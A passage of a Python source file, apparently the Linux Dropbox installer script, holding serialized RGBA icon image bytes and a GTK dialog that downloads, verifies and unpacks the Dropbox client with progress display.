x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00f\xff2\x00c\xff\xcc\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xcc\x00d\xff3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xaa\xff\x03\x00c\xffo\x00c\xff\xf3\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xf3\x00d\xffp\x00\xaa\xff\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\xff\x1c\x00c\xff\xaf\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xb0\x00d\xff\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\xffO\x00c\xff\xe3\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xe3\x00c\xffP\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00j\xff\x0c\x00b\xff\x8f\x00b\xff\xfc\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xfc\x00c\xff\x90\x00j\xff\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\xff3\x00c\xff\xcc\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xcc\x00d\xff3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xaa\xff\x03\x00c\xffo\x00c\xff\xf3\x00b\xff\xff\x00b\xff\xff\x00c\xff\xf3\x00d\xffp\x00\xaa\xff\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\xff\x1c\x00c\xff\xaf\x00c\xff\xb0\x00d\xff\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', GdkPixbuf.Colorspace.RGB, True, 8, 64, 64, 256)
window_icon = GdkPixbuf.Pixbuf.new_from_data(b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00f\xff2\x00d\xff3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\xff3\x00d\xff3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00j\xff\x0c\x00b\xff\x8f\x00b\xff\xfc\x00b\xff\xfc\x00b\xff\x8f\x00j\xff\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00j\xff\x0c\x00b\xff\x8f\x00b\xff\xfc\x00b\xff\xfc\x00b\xff\x8f\x00j\xff\x0c\x00\x00\x00\x00\x00b\xffN\x00b\xff\xe2\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xe2\x00d\xffO\x00b\xffN\x00b\xff\xe2\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xe2\x00b\xffN\x00e\xffQ\x00b\xff\xe4\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xe4\x00d\xffR\x00e\xffQ\x00b\xff\xe4\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xe4\x00e\xffQ\x00\x00\x00\x00\x00b\xff\r\x00d\xff\x92\x00c\xff\xfd\x00c\xff\xfd\x00d\xff\x92\x00b\xff\r\x00\x00\x00\x00\x00\x00\x00\x00\x00b\xff\r\x00d\xff\x92\x00c\xff\xfd\x00c\xff\xfd\x00d\xff\x92\x00b\xff\r\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00b\xffe\x00d\xfff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\xfff\x00d\xfff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00t\xff\x0b\x00b\xff\x8c\x00b\xff\xfc\x00b\xff\xfc\x00c\xff\x8d\x00t\xff\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00t\xff\x0b\x00b\xff\x8c\x00b\xff\xfc\x00b\xff\xfc\x00b\xff\x8c\x00t\xff\x0b\x00\x00\x00\x00\x00c\xffK\x00c\xff\xe0\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xe1\x00e\xffL\x00e\xffL\x00c\xff\xe1\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xe1\x0
0e\xffL\x00d\xffT\x00c\xff\xe5\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xe6\x00c\xffU\x00d\xffT\x00c\xff\xe6\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xe6\x00d\xffT\x00\x00\x00\x00\x00m\xff\x0e\x00b\xff\x94\x00c\xff\xfd\x00c\xff\xfd\x00c\xff\x95\x00i\xff\x11\x00c\xffj\x00d\xffk\x00i\xff\x11\x00c\xff\x95\x00c\xff\xfd\x00c\xff\xfd\x00c\xff\x95\x00m\xff\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00f\xff7\x00d\xff8\x00d\xff.\x00b\xff\xc8\x00b\xff\xff\x00b\xff\xff\x00b\xff\xc8\x00g\xff/\x00f\xff7\x00f\xff7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00b\xff\x7f\x00c\xff\xfb\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xfb\x00d\xff\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00h\xff \x00b\xff\xb6\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xb7\x00d\xff!\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\xffW\x00b\xff\xe7\x00b\xff\xe7\x00d\xffW\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00f\xff\x0f\x00p\xff\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', GdkPixbuf.Colorspace.RGB, True, 8, 16, 16, 64)
# Truthy only when an X display is reachable; holds the raw $DISPLAY value
# ('' when unset). Gates the GTK download UI defined below.
GUI_AVAILABLE = os.environ.get("DISPLAY", '')
if GUI_AVAILABLE:
def download():
import gi
gi.require_version('Gdk', '3.0')
gi.require_version('Gtk', '3.0')
from gi.repository import GObject
from gi.repository import Gdk
from gi.repository import Gtk
from gi.repository import Pango
import webbrowser
GObject.threads_init()
load_serialized_images()
global FatalVisibleError
def FatalVisibleError(s):
error = Gtk.MessageDialog(parent = None,
flags = Gtk.DialogFlags.MODAL,
type = Gtk.MessageType.ERROR,
buttons = Gtk.ButtonsType.OK,
message_format = s)
error.set_title("Error")
error.run()
Gtk.main_quit()
sys.exit(-1)
class GeneratorTask(object):
def __init__(self, generator, loop_callback, on_done=None, on_exception=None):
self.generator = generator
self.loop_callback = loop_callback
self.on_done = on_done
self.on_exception = on_exception
def _run(self, *args, **kwargs):
self._stopped = False
try:
for ret in self.generator(*args, **kwargs):
if ret is None:
ret = ()
if not isinstance(ret, tuple):
ret = (ret,)
GObject.idle_add(self.loop_callback, *ret)
if self._stopped:
_thread.exit()
except Exception as e:
print(e)
if self.on_exception is not None:
GObject.idle_add(self.on_exception, e)
else:
if self.on_done is not None:
GObject.idle_add(self.on_done)
def start(self, *args, **kwargs):
t = threading.Thread(target=self._run, args=args, kwargs=kwargs)
t.setDaemon(True)
t.start()
def stop(self):
self._stopped = True
class DownloadDialog(Gtk.Dialog):
def handle_delete_event(self, wid, ev, data=None):
self.handle_cancel(wid)
def handle_dont_show_toggle(self, button, data=None):
reroll_autostart(not button.get_active())
def handle_cancel(self, button):
if self.task:
self.task.stop()
if self.download:
self.download.cancel()
Gtk.main_quit()
self.user_cancelled = True
def handle_ok(self, button):
# begin download
self.ok.hide()
self.download = DownloadState()
self.label.hide()
if self.dont_show_again_align is not None:
self.dont_show_again_align.hide()
self.progress.show()
def download_progress(progress, status):
if not status:
self.task.stop()
self.update_progress(DOWNLOADING, progress)
def finished():
self.update_progress(DOWNLOADING, 1.0)
self.unpack_dropbox()
def error(ex):
FatalVisibleError(ERROR_CONNECTING)
self.update_progress(DOWNLOADING, 0)
self.task = GeneratorTask(self.download.copy_data,
download_progress,
finished, error).start()
def update_progress(self, text, fraction):
self.progress.set_text(text % int(fraction*100))
self.progress.set_fraction(fraction)
def unpack_dropbox(self):
def unpack_progress(name, i, total):
self.update_progress(UNPACKING, float(i)/total)
def finished():
self.update_progress(UNPACKING, 1.0)
if not self.download.is_dropbox_valid():
FatalVisibleError(ERROR_INVALID_DROPBOX)
Gtk.main_quit()
def error(ex):
if isinstance(ex, SignatureVerifyError):
FatalVisibleError(ERROR_SIGNATURE)
else:
FatalVisibleError(ERROR_CONNECTING)
self.task = GeneratorTask(self.download.unpack,
unpack_progress,
finished, error).start()
def mouse_down(self, widget, event):
if self.hovering:
self.clicked_link = True
def mouse_up(self, widget, event):
if self.clicked_link:
webbrowser.open(LINK)
self.clicked_link = False
def label_motion(self, widget, event):
offx, offy = self.label.get_layout_offsets()
layout = self.label.get_layout()
index = layout.xy_to_index(int((offx+event.x)*Pango.SCALE),
int((offy+event.y)*Pango.SCALE))[1]
link_index = layout.get_text().find(LINK)
if index >= link_index and index < link_index+len(LINK):
self.hovering = True
self.label_box.get_window().set_cursor(Gdk.Cursor(Gdk.CursorType.HAND2))
else:
self.hovering = False
self.label_box.get_window().set_cursor(Gdk.Cursor(Gdk.CursorType.ARROW))
def __init__(self):
super(DownloadDialog, self).__init__(parent = None,
title = "Dropbox Installation")
self.download = None
self.hovering = False
self.clicked_link = False
self.user_cancelled = False
self.task = None
self.ok = ok = Gtk.Button(stock=Gtk.STOCK_OK)
ok.connect('clicked', self.handle_ok)
self.action_area.add(ok)
ok.show()
cancel = Gtk.Button(stock=Gtk.STOCK_CANCEL)
cancel.connect('clicked', self.handle_cancel)
self.action_area.add(cancel)
cancel.show()
self.connect('delete_event', self.handle_delete_event)
self.box_logo = Gtk.Image.new_from_pixbuf(box_logo_pixbuf)
self.box_logo.show()
self.set_icon(window_icon)
self.progress = Gtk.ProgressBar()
self.progress.set_property('width-request', 300)
self.progress.set_property('show-text', True)
self.label = Gtk.Label()
GPG_WARNING_MSG = ("\n\n" + GPG_WARNING) if not gpg and not gpgme else ""
self.label.set_markup('%s <span foreground="#000099" underline="single" weight="bold">%s</span>\n\n%s%s' % (INFO, LINK, WARNING, GPG_WARNING_MSG))
self.label.set_line_wrap(True)
self.label.set_property('width-request', 300)
self.label.show()
self.label_box = Gtk.EventBox()
self.label_box.add(self.label)
self.label_box.connect("button-release-event", self.mouse_up)
self.label_box.connect("button-press-event", self.mouse_down)
self.label_box.connect("motion-notify-event", self.label_motion)
self.label_box.show()
def on_realize(widget):
self.label_box.add_events(Gdk.EventMask.POINTER_MOTION_MASK)
self.label_box.connect("realize", on_realize)
self.hbox = Gtk.HBox(spacing=10)
self.hbox.set_property('border-width',10)
